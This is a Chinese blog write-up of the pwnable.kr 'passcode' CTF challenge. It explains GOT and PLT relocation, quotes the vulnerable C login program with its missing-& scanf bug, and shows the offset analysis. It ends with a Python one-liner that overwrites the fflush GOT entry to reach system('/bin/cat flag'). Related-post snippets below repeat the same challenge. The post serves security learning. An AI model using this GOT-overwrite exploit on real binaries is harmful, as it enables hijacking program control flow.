pwnable 笔记 Toddler's Bottle - passcode

最新推荐文章于 2020-11-09 13:11:41 发布
最新推荐文章于 2020-11-09 13:11:41 发布
阅读量2.9k 收藏 1
点赞数 1
分类专栏: pwn pwnable.kr 题解 文章标签: pwnable GOT linux 安全 scanf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/smalosnail/article/details/53027024
版权

注:

这题涉及到了GOT覆写技术,我更新了一篇讲GOT覆写的文章,以这道题做的例子,讲的比较详细,大家可以参考一下:

 http://blog.csdn.net/smalosnail/article/details/53247502


-----------------------------------------------------------------------------------------------------------------------------------------------------


这题拿到的时候根本找不到思路,哎,基础知识不够。于是补充了一下Linux关于GOT和PLT的知识

GOT表:

概念:每一个外部定义的符号在全局偏移表(Global offset Table )中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。

作用:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器(rtld)找到相应的符号,并将它重定位到GOT之后每次调用这个函数都会将控制权直接转向那个位置,而不再调用rtld。

PLT

过程连接表(Procedure LinkageTable),一个PLT条目对应一个GOT条目

当main函数开始,会请求plt中这个函数的对应GOT地址,如果第一次调用那么GOT会重定位到plt,并向栈中压入一个偏移,程序的执行回到_init()函数,rtld得以调用就可以定位printf的符号地址,第二次运行程序再次调用这个函数时程序跳入plt,对应的GOT入口点就是真实的函数入口地址。

动态连接器并不会把动态库函数在编译的时候就包含到ELF文件中,仅仅是在这个ELF被加载的时候,才会把那些动态函库数代码加载进来,之前系统只会在ELF文件中的GOT中保留一个调用地址.

GOT覆写技术:

原理:由于got表是可写的,把其中的函数地址覆盖为我们shellcode地址,在程序进行调用这个函数时就会执行shellcode。

以上姿势来源: http://jing0107.lofter.com/post/1cbc869f_8b3d8a5


知识补充完毕,开始看题目


登录服务器后get题目源码如下:

#include <stdio.h>
#include <stdlib.h>

void login(){
	int passcode1;
	int passcode2;

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
	printf("enter passcode2 : ");
        scanf("%d", passcode2);

	printf("checking...\n");
	if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
		exit(0);
        }
}

void welcome(){
	char name[100];
	printf("enter you name : ");
	scanf("%100s", name);
	printf("Welcome %s!\n", name);
}

int main(){
	printf("Toddler's Secure Login System 1.0 beta.\n");

	welcome();
	login();

	// something after login...
	printf("Now I can safely trust you that you have credential :)\n");
	return 0;	
}

思路:

看完源代码,发现只要 passcode1==338150 && passcode2==13371337就可以拿到flag,但是login()函数中的scanf("%d", passcode1);没有加&,没有办法把338150和13371337直接输入进去。但由于scanf没加&时会从栈中读取4个字节当scanf取的地址,并把scanf后输入的的内容存到那里,于是我们可以修改栈中的数据,写一个任意4字节的地址进去,来充当scanf取的地址。于是可以利用前面提到的GOT覆写技术,用一个GOT表中的函数地址来充当scanf取的地址,然后把system("/bin/cat flag")这条指令的地址通过scanf写到这个函数中,当这个函数被调用时,就会直接跳到system("/bin/cat flag")



有了思路做起来就轻松多了,首先查看一下GOT表中都有哪些函数

$ readelf -r ./passcode


看到了printf, fflush,exit 并且找到了system函数的偏移量,之后就是要确定变量name和passcode1,passcode2的位置。

$ objdump -d ./passcode



找到name位于ebp-0x70,passcode1位于ebp-0x10,passcode2位于ebp-0xc
,name与passcode1之间隔了0x70-0x10=96个字节,用fflush()的地址覆盖passcode1后,scanf("%d",&fflush())将会把之后的输入写入到GOT表中,于是把login()中system("/bin/cat flag")的地址转换成十进制写进去,当程序调用fflush()的时候就会执行system()



$ python -c "print 'A'*96+'\x00\xa0\x04\x08'+'134514147\n'" | ./passcode
TaQini852
关注
专栏目录
pwnable.kr之passcode
Jason_ZhouYetao的博客
06-27 342
这题主要是的难点是GOT覆写技术的运用。这里推荐几篇文章有关栈溢出和GOT表和PLT表知识的文章。 栈溢出从入门到放弃(上) 栈溢出从入门到放弃(下) GOT表和PLT表知识详解 话不多说,先看正题。 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; void login(){ int passcode1; int passco...
PWN学习之[Toddler''s Bottle]-[bof]
Magic1an的博客
08-19 498
将bof和bof.c文件下载下来 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key ==
pwnable passcode 10pt
热门推荐
龙哥盟
03-18 3万+
题目在ssh passcode@pwnable.kr -p2222 (pw:guest)先看passcode.c:#include <stdio.h> #include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); s
pwnable-passcode
just do IT
06-22 146
源码 : #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha! mommy told me t...
Pwnablepasscode
neuisf的博客
12-15 257
pwnable第一道求助题 前几天开始做pwnable的练习题,前四题比较容易,到了第五题,本机调试可以获取flag,但是,在远程主机上却失败了。 原因:本机某地址可写入而远程主机该地址不可写导致程序异常。 漏洞:源代码passcode.c的第九行,scanf的参数passcode1未初始化且无&符号,导致实际读入的数字写入到了passcode1的值所代表的地址中,而不是读取到pas...
passcode - pwnable
SkYe's Blog
08-24 327
passcode - pwnable 本题运用到GOT表覆写技术,先摘取一段来自Jing0107关于LinuxGOT和PLT的知识: GOT表: 概念:每一个外部定义的符号在全局偏移表(Global offset Table )中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。 作用:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器(rtld)找到...
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
在这个项目中,可能会有一个名为`toddler_care`的应用,包含了模型、视图、模板和静态文件。 3. **数据库模型**:在`models.py`文件中定义数据库模型,如`Nanny`(保姆)、`Product`(产品)和`Order`(订单)。...
Toddler Tap-开源
07-20
【 Toddler Tap 开源项目详解】 “Toddler Tap”是一个专为幼儿设计的开源软件,旨在激发孩子们对键盘和字母的初步认知。这个项目源于一个简单而温馨的观察:当小孩子们看到大人在电脑上敲击键盘时,他们通常会表现...
A Toddler Game-开源
05-26
至于“Toddler-windows”这个文件,很可能是游戏的Windows版本安装包或者执行文件。这意味着开发者已经为Windows用户提供了一个方便的执行版本,无需在Windows环境中自行编译源代码,简化了用户的使用流程。 总的来...
PWN学习之[Toddler''s Bottle]-[passcode]
Magic1an的博客
08-19 502
打开passcode.c,可以看到源码如下:#include <stdio.h> #include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha!
pwnable.kr】 passcode
think_ycx的专栏
07-09 545
下载程序scp -P 2222 -p passcode@pwnable.kr:/home/passcode/* ./漏洞信息程序main函数中,welcome和login存在栈复用,welcome调用gets向ebp-0x70读入100个字符。 login中scanf没有取地址,因此会把[ebp-10h]和[ebp-0xch]的内容当成要写入的地址。在welcome中,我们有一次布置数据的机会,可...
pwnable.kr第二遍---passcode
leeham的博客
03-16 314
&gt;&gt;&gt;&gt;&gt;passcode1.题目中有两个scanf("%d",addr)的不标准格式按照scanf()的使用,应该是将stdin的整型数赋值给地址addr处而接下来的passcode1==338150&amp;&amp;passcode2=13371337两个判断条件其中passcode1和passcode2是整型int addr;假如输入100则*addr=100...
pwnable.kr [Toddler's Bottle] - passcode
Re:Umiade.tr
03-27 540
Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.k
pwnable.kr-passcode
qq_35661990的博客
09-18 599
这道题的难点在于GOT表覆写,理解了GOT表和PLT表的关系就比较好做了。 函数在调用printf等函数的时候需要访问PLT表,而PLT表中储存的是GOT表对应项的地址。 另外一点就是scanf的参数如果没有加&amp;地址符,就会把参数所在栈内的4个字节(我认为是因为题目中要传入%d是四字节的int型吧)当作地址,然后把缓冲区的数据输入进去。(在IDA中看,就是有加地址符,程序会执行lea指...
pwnable.kr - passcode
ACdream
10-12 527
pwnable.kr passcode
pwnable.kr 之passcode summary
Bill
04-23 690
本人写这篇博客完全是为了方便以后查证,若能帮上各位的忙,在线非常宽慰. 关于pwnable.kr上的passcode,这博客写的很到位,大家不妨去看一下:passcode.我在这里只是补充几个问题,再将整个过程简单化而已. 1.plt表和got表的关系   plt表—->got表.当程序中有需要库函数时,该plt和got表上场了.我们来举一个简单的例子(test.c):#include <st
(C++对象模型):虚函数地址问题的vcall引入
baidu_41388533的博客
11-09 318
虚函数地址问题的vcall引入 class MYACLS { public: virtual void myvirfunc1() { } virtual void myvirfunc2() { } }; int main() { printf("MYACLS::myvirfunc1()地址=%p\n", &MYACLS::myvirfunc1); //打印的是vcall函数(代码)地址,而不是真正的虚函数; printf("MYACLS::myvirfunc2()地址=%
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
最新发布
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值